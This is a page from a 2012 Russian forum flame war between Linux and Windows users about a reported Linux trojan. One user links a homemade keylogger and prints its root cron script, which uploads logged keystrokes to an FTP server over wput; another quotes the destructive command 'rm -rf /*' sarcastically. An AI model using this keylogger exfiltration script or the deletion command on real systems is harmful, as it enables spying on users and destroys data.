Обнаружен первый в истории троянец для Linux. (Страница 10) / Дорога, открытая всем / Форум StopLinux

Объявление

Kwork.ru - услуги фрилансеров от 500 руб.

#226 14-09-12 16:05:05

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Opera 12.02

Re: Обнаружен первый в истории троянец для Linux.

usual_user пишет:

Мои шлет?

Не, ну не сейчас жэ  smile Я же тэщщу!!!


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#227 14-09-12 16:06:35

usual_user
Участник
Из Слава Україні!
Зарегистрирован: 30-03-11
Сообщений: 1,021
UbuntuChrome 18.0.1025.168

Re: Обнаружен первый в истории троянец для Linux.

UPS пишет:

Только вы учтите,что у нас с ними борются активно и успешно-это раз.

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей. tongue


Ущербность всегда агрессивна, и эта агрессивность проявляется прежде всего на уровне языка.
То, что о тебе говорят люди, никак не характеризует тебя, зато прекрасно характеризует их.
Кукушка тролит петуха, за то что тролит тот кукушку.

Неактивен

#228 14-09-12 16:07:51

UPS
Участник
Зарегистрирован: 19-02-12
Сообщений: 2,145
UnknownInternet Explorer 999.1

Re: Обнаружен первый в истории троянец для Linux.

ikkunan salvataja пишет:

Ты это, не отвлекайся, а давай придумывай. Как придумаешь нам покажешь. Ну а мы уж ещё посмеёмся.

Это вы там не отвлекайтесь,по вашей аналогии вирусов в виндовс нет!!!!!!!  Давайте мне на проверку,если что сразу скажу-все пипец ,не безопасно однако big_smile


К счастью, мой заработок не сильно зависит от компьютера, иначе бы Линукс было бы проблематично использовать. Меня не особо интересует, что там у других. Меня волнует линукс для моих задач. А если ~1.5% пользователей устраивает линукс - остальным 98.5% от этого не сильно легче. #178. SemyonKozakov
https://stoplinux.org.ru/reviews/review_Ubuntu_LTS_10.04.html

Неактивен

Следующие пользователи поставили вам "+1":Белая рысь

#229 14-09-12 16:09:32

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Opera 12.02

Re: Обнаружен первый в истории троянец для Linux.

usual_user пишет:

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей


Ну дошло ещё хоть до одного! Блять, вы бы мишек пожалели, мало их осталось  smile


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

Следующие пользователи поставили вам "+1":UPS

#230 14-09-12 16:13:35

usual_user
Участник
Из Слава Україні!
Зарегистрирован: 30-03-11
Сообщений: 1,021
UbuntuChrome 18.0.1025.168

Re: Обнаружен первый в истории троянец для Linux.

selenscy пишет:

Ну дошло ещё хоть до одного!

Не, это до тебя дошло, что я это имею ввиду. Но суть от этого не мепняется. Убунту безопаснее. До каких пор будет продолжаться это безобразие  big_smile ? Хз. Но пока продолжается, меня все устраивает.


Ущербность всегда агрессивна, и эта агрессивность проявляется прежде всего на уровне языка.
То, что о тебе говорят люди, никак не характеризует тебя, зато прекрасно характеризует их.
Кукушка тролит петуха, за то что тролит тот кукушку.

Неактивен

#231 14-09-12 16:32:42

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Opera 12.02

Re: Обнаружен первый в истории троянец для Linux.

Тут вон про компы с предустановленым поделием всё школота мечтала  smile

"Исследователи из Microsoft в ходе контрольной закупки новых компьютеров в Китае обнаружили, что на некоторых их них установлено вредоносное программное обеспечение, говорится в блоге компании.
Было закуплено 20 компьютеров, из них 10 были ноутбуками, а 10 - настольными системами. Покупки совершались в разных городах Китая. Подозрительные программы были найдены на 4 компьютерах.

Вину за установку опасного ПО на машины Microsoft возложила на недобросовестных поставщиков. Сообщается, что на инфицированных компьютерах были установлены нелегальные копии ОС Windows XP или Windows 7.

Один из купленных ноутбуков был заражен вирусом Nitol, который подключал компьютер к одноименному ботнету. Отследив, куда программа обращается за инструкциями, Microsoft смогла вывести из строя центр управления ботнетом.

Закупка компьютеров проводилась в рамках программы Project MARS, которая является инициативой Microsoft. В прошлом Microsoft, действуя совместно с другими компаниями, обезвредила ботнеты Waledac, Rustock и Kelihos." https://www.lenta.ru/news/2012/09/14/nitol/

Хи-хи-хи! Скажите спасибо, что там винда стояла  lol  lol  lol

Редактировался selenscy (14-09-12 16:33:05)


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#232 14-09-12 16:57:28

Белая рысь
Мартовский кот
Зарегистрирован: 13-08-10
Сообщений: 763
Windows 7Internet Explorer 10.0

Re: Обнаружен первый в истории троянец для Linux.

Rector пишет:

Только у меня одного ощущение, что присутствующая здесь виндузня живет в альтернативном мире?

Альтернативном луноходному-то? Однозначно.

Rector пишет:

У них нет вирусов и прочей дряни.

Дяденька, не перекладывайте с больной головы на здоровую, это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде. По крайней мере, нам вы их показать не смогли.

Rector пишет:

Они все работают под ограниченной и охуенно тюнингованной учеткой. Ведут аудит системы. На каждый чих системы запускают эвристическую проверку. У них просто всё работает. УМВР.

Ололо, ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!! Пакет разобрать, провести аудит, просмотреть стартап-скрипты, запуск демона!!!
И это только то, что про Linux прозвучало за 1 день. У кого, говорите, всё то, что перечислено Вами? *лапаморда*

Rector пишет:

Только где вдалеке слышны вопли других виндузятников - Помогите! Я увидел чёрный баннер! *лядь! Опять спиздили почту! Ну козлы! Взомали учотку в контакти!

А здесь слышны вопли линуксоидов: "Блин, ну, когда же они выпустят обновление?" "Этой программы под Linux нету, и под вайн она не работает" "Драйверов для этой железки не делали" "Мне в игрушку поиграть, пойду, перезагружусь в дырявую и глючную винду"
Фэйл.


Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.

Неактивен

#233 14-09-12 17:34:04

Rector
ректор Захаров
Зарегистрирован: 07-03-10
Сообщений: 1,584
LinuxChrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Белая рысь пишет:

Дяденька, не перекладывайте с больной головы на здоровую, это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде.

Да неужели!? Вот, я даже как не программист написал вам (всем) примеры. Легонькие, не большие примеры, как я был имел винду. Даже при этом не зная программирования.

Белая рысь пишет:

Ололо, ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!!

С удовольствием посмотрим на примеры настройки Вашего дистра,  Вами,  Как это Вы всё так настроили? Перечисленные Вами утилиты для настройки Linux. Может по Вашему коду другие сделают кнопку "Сделать Заебись!"


Винда - это ведро с тухлыми червями. (с) Rector
---
-хакир недоучка, некто Ректор, прославленный мудак из мухосранска, автор «Я этого не потерплю» и «Cмотри,а то я начну работать против тебя» «Ломаю по IP недорого» и других не менее веселых выражений. Любитель подсматривать в замочную скважину и читать чужую почту. (c) Неизвестный техник из лаборатории

Неактивен

#234 14-09-12 17:36:49

Белая рысь
Мартовский кот
Зарегистрирован: 13-08-10
Сообщений: 763
Windows 7Internet Explorer 10.0

Re: Обнаружен первый в истории троянец для Linux.

Rector пишет:

С удовольствием посмотрим на примеры настройки Вашего дистра,  Вами,  Как это Вы всё так настроили? Перечисленные Вами утилиты для настройки Linux. Может по Вашему коду другие сделают кнопку "Сделать Заебись!"

Я? Окститесь, это Ваши единомышленники тут сказки Венского леса рассказывают. Я вообще махровый виндузятник. Вплоть до того, что отключаю iptables, потому что не знаю, как разрешить входящее подключение.


Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.

Неактивен

#235 14-09-12 18:04:14

Rector
ректор Захаров
Зарегистрирован: 07-03-10
Сообщений: 1,584
LinuxChrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Белая рысь пишет:

Я вообще махровый виндузятник. Вплоть до того, что отключаю iptables, потому что не знаю, как разрешить входящее подключение.

О! Может по netsh мастер--класс покажете?

Добавлено спустя 22 мин 49 с:

UPS пишет:

Давайте мне на проверку,если что сразу скажу-все пипец ,не безопасно однако

Дак качай -) Потом отпишись со скриншотами. Как всё было!? -))


Винда - это ведро с тухлыми червями. (с) Rector
---
-хакир недоучка, некто Ректор, прославленный мудак из мухосранска, автор «Я этого не потерплю» и «Cмотри,а то я начну работать против тебя» «Ломаю по IP недорого» и других не менее веселых выражений. Любитель подсматривать в замочную скважину и читать чужую почту. (c) Неизвестный техник из лаборатории

Неактивен

#236 14-09-12 18:37:40

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Chrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

В общем вот вам простейший вариант тестовый вариант трояна кейлоггера с передачей всех нажатых клавиш, по ftp, на прописаный вами удалённый ip, с установленым ftp сервером, составленый всего лишь из ёпенсорцных утилит  https://rghost.net/40359458, как и обещал. Только там в файлике /CONTENTS/etc/cron.hourly/cronlwput надо выставить правильный адресок с логином и паролем  wink Естественно светить своими  айпишниками и пассами я не собираюсь  smile

Редактировался selenscy (14-09-12 18:38:07)


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#237 14-09-12 18:39:52

Rector
ректор Захаров
Зарегистрирован: 07-03-10
Сообщений: 1,584
LinuxChrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

selenscy, Это не будет работать.


Винда - это ведро с тухлыми червями. (с) Rector
---
-хакир недоучка, некто Ректор, прославленный мудак из мухосранска, автор «Я этого не потерплю» и «Cмотри,а то я начну работать против тебя» «Ломаю по IP недорого» и других не менее веселых выражений. Любитель подсматривать в замочную скважину и читать чужую почту. (c) Неизвестный техник из лаборатории

Неактивен

#238 14-09-12 18:40:44

Белая рысь
Мартовский кот
Зарегистрирован: 13-08-10
Сообщений: 763
Windows 7Internet Explorer 10.0

Re: Обнаружен первый в истории троянец для Linux.

Rector пишет:

О! Может по netsh мастер--класс покажете?

Зависит от того, а что, собсно надо... Давайте задачу.


Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.

Неактивен

#239 14-09-12 18:41:54

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Chrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Rector пишет:

selenscy, Это не будет работать.

А чойта?  wink У мну работает  wink

Уебанта 10.04 32 бита  smile

Редактировался selenscy (14-09-12 18:45:09)


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#240 14-09-12 18:42:14

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Из Клоаки
Зарегистрирован: 01-06-10
Сообщений: 1,604
Сайт
LinuxFirefox 15.0.1

Re: Обнаружен первый в истории троянец для Linux.

Белая рысь пишет:

это у вас вирусов нет ни в линуксе, ни, как оказалось, в винде

А что, таки есть? Ссылочкой не поделитесь?

Белая рысь пишет:

ограниченная учётка по умолчанию, noexec, selinux, chroot, запуск от другого пользователя, iptables!!! У кого, говорите, всё то, что перечислено Вами? *лапаморда*

У меня. Ну, кроме SELinux, который нафиг не нужен на домашней машине. Браузер, например, запускается от другого пользователя, права которого урезаны по самое "не могу" и "хомяк" которого потерять не жалко. А "noexec" — вообще святое дело для "хомяка". Все нужные каталоги и скрипты вынесены на другой раздел, в котором разрешено исполнение. Есть, правда, ещё /tmp, но он очищается при выходе. И его можно (при желании) вообще в ОЗУ смонтировать.
В бубунтах, насколько я знаю, AppArmor по умолчанию. И настройки у него довольно продуманные.

Добавлено спустя 02 мин 42 с:

selenscy пишет:

/etc/cron.hourly

Опять влажные мечты вендузятнега? И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

Неактивен

#241 14-09-12 18:45:58

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Chrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Apollo 11 пишет:

Опять влажные мечты вендузятнега? И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ!!!!

[....пишет из под стола....]


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#242 14-09-12 18:48:27

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Из Клоаки
Зарегистрирован: 01-06-10
Сообщений: 1,604
Сайт
LinuxFirefox 15.0.1

Re: Обнаружен первый в истории троянец для Linux.

usual_user пишет:

Я б учел что, кол-во желающих и способных писать вирус под ос прямо пропорционально числу его пользователей.

Выходит, что в 2000-2002 годах (да и в 2004-2005, ЕМНИП) под Linux сидело гораздо больше пользователей, чем сейчас? Ну, если говорить о прямых пропорциях вирус/число_пользователей. Парадокс?

Неактивен

#243 14-09-12 18:49:04

Rector
ректор Захаров
Зарегистрирован: 07-03-10
Сообщений: 1,584
LinuxChrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Белая рысь пишет:

Давайте задачу.

Смените мне, плз...Прокси сервер у юзера.


Винда - это ведро с тухлыми червями. (с) Rector
---
-хакир недоучка, некто Ректор, прославленный мудак из мухосранска, автор «Я этого не потерплю» и «Cмотри,а то я начну работать против тебя» «Ломаю по IP недорого» и других не менее веселых выражений. Любитель подсматривать в замочную скважину и читать чужую почту. (c) Неизвестный техник из лаборатории

Неактивен

#244 14-09-12 18:50:26

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Из Клоаки
Зарегистрирован: 01-06-10
Сообщений: 1,604
Сайт
LinuxFirefox 15.0.1

Re: Обнаружен первый в истории троянец для Linux.

selenscy пишет:

ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ!!!!

[....пишет из под стола....]

Серьёзный аргумент, да.

Неактивен

#245 14-09-12 18:53:44

Белая рысь
Мартовский кот
Зарегистрирован: 13-08-10
Сообщений: 763
Windows 7Internet Explorer 10.0

Re: Обнаружен первый в истории троянец для Linux.

Apollo 11 пишет:

А что, таки есть? Ссылочкой не поделитесь?

Нет-нет, меня всё устраивает, мне и без вирусов хорошо. А за поделиями разной степени глюкавости - в соседнюю ветку, пожалуйста. smile)

Apollo 11 пишет:

У меня. Ну, кроме SELinux, который нафиг не нужен на домашней машине. Браузер, например, запускается от другого пользователя, права которого урезаны по самое "не могу" и "хомяк" которого потерять не жалко. А "noexec" — вообще святое дело для "хомяка". Все нужные каталоги и скрипты вынесены на другой раздел, в котором разрешено исполнение. Есть, правда, ещё /tmp, но он очищается при выходе. И его можно (при желании) вообще в ОЗУ смонтировать.В бубунтах, насколько я знаю, AppArmor по умолчанию. И настройки у него довольно продуманные.

Не, не поймите правильно, я подобный подход всячески одобряю. Просто некоторые тут возмущаются не по делу.


Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.

Неактивен

#246 14-09-12 18:57:35

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Chrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

Apollo 11 пишет:

Серьёзный аргумент, да.

Ну так если ты такой тупой швабодный илитный шписиалист ?  big_smile  Какие ещё могут быть аргументы?  lol  lol  lol

Чо там говорить, берёшь и ставишь  wink Хуле, вы же ничо не боитесь  cool Проверить можно, посмотрев через часик /var/log/keys  wink До кучи можно подправить в /etc/cron.hourly/ файлег cronlwput изменив

#!/bin/sh
#

wput -u --reupload /var/log/keys ftp://login:password@your_adress

exit 0

на ваши значения ftp, чтобы просто убедиться  tongue

Удачи в кейлоггировании и приёме логов!!!  cool

Редактировался selenscy (14-09-12 19:05:40)


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#247 14-09-12 19:05:28

Apollo 11
Тролль № 1 (по рейтингу Svart'а Testare)
Из Клоаки
Зарегистрирован: 01-06-10
Сообщений: 1,604
Сайт
LinuxFirefox 15.0.1

Re: Обнаружен первый в истории троянец для Linux.

Белая рысь пишет:

Просто некоторые тут возмущаются не по делу.

А-а-а-а, ну это как всегда на СЛОРе.

selenscy пишет:

Чо там говорить, берёшь и ставишь

П-ф-ф-ф-ф-ф... lol И это всё, на что хватило твоего скудного умишка? Даже на /tmp ума не хватило? lol Может, я тебе ещё и сам помочь должен, прописав в консоли:

# rm -rf /*

???? lol Короче, клоун, залезь обратно под свою табуретку, под стол, под диван, или откуда там тебе привычнее нести околесицу, и больше не пытайся делать умный вид. Подобная тупость — это настолько грустно, что уже даже и не смешно. Хацкер, блин! lol

Неактивен

#248 14-09-12 19:07:34

selenscy
Участник
Зарегистрирован: 28-11-10
Сообщений: 2,558
Windows 7Chrome 21.0.1180.89

Re: Обнаружен первый в истории троянец для Linux.

ЫЫЫЫЫЫ!!!!

selenscy пишет:

простейший вариант тестовый вариант

Я уже ссу кипятком на списиалистов!!!  lol  lol  lol Видать работает даже этот примитив  cool И насрать ему на илитное мнение швабодного списиалиста

Apollo 11 пишет:

И каким х*ем ты туда дотянешься без пароля root'а? Будешь искать дыры в sudo?

Вместе с рутом  lol  lol  lol Потому как команды в cron.hourly выполняются из под рута  tongue

Редактировался selenscy (14-09-12 19:14:49)


База сама по себе сплошной скрипт (с) AleksK

При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка smile

Неактивен

#249 14-09-12 19:14:04

Белая рысь
Мартовский кот
Зарегистрирован: 13-08-10
Сообщений: 763
Windows 7Internet Explorer 10.0

Re: Обнаружен первый в истории троянец для Linux.

Rector пишет:

Смените мне, плз...Прокси сервер у юзера.

Прошу прощения, привёл нерабочий пример. Сообщение удалил.


Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.

Неактивен

Kwork.ru - услуги фрилансеров от 500 руб.
Мой VPS с 2016 года !
✅ Виртуальные от 300 ₽/месяц, RAM 1-10GB, DISK 20-360 GB;
✅ Выделенные от 3000 ₽/месяц. RAM 4-64GB, DISK до 4TB;
✅ Intel Xeon, SSD, XEN, iLO/KVM, Windows/Linux, Администрирование;
✅ Бесплатно Full Backup и Anti-DDoS.





Подвал форума

Под управлением FluxBB
Модифицировал Visman

Яндекс.Метрика